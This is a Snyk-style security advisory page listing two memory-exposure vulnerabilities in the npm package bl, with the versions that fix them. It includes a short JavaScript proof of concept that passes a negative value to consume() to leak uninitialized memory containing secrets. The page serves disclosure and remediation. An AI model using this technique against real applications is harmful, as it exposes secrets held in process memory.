bl@1.0.0 vulnerabilities

Buffer List: collect buffers and access with a standard readable Buffer interface, streamable too!

Direct Vulnerabilities

Known vulnerabilities in the bl package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Remote Memory Exposure

bl is a library that allows you to collect buffers and access with a standard readable buffer interface.

Affected versions of this package are vulnerable to Remote Memory Exposure. If user input ends up in consume() argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.

PoC by chalker

const { BufferList } = require('bl')
const secret = require('crypto').randomBytes(256)
for (let i = 0; i < 1e6; i++) {
  const clone = Buffer.from(secret)
  const bl = new BufferList()
  bl.append(Buffer.from('a'))
  bl.consume(-1024)
  const buf = bl.slice(1)
  if (buf.indexOf(clone) !== -1) {
    console.error(`Match (at ${i})`, buf)
  }
}

How to fix Remote Memory Exposure?

Upgrade bl to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.

>=2.2.0 <2.2.1 >=3.0.0 <3.0.1 >=4.0.0 <4.0.3 <1.2.3
  • M
Uninitialized Memory Exposure

bl is a storage object for collections of Node Buffers.

A possible memory disclosure vulnerability exists when a value of type number is provided to the append() method and results in concatenation of uninitialized memory to the buffer collection.

This is a result of unobstructed use of the Buffer constructor, whose insecure default constructor increases the odds of memory leakage.

<0.9.5 >=1.0.0 <1.0.1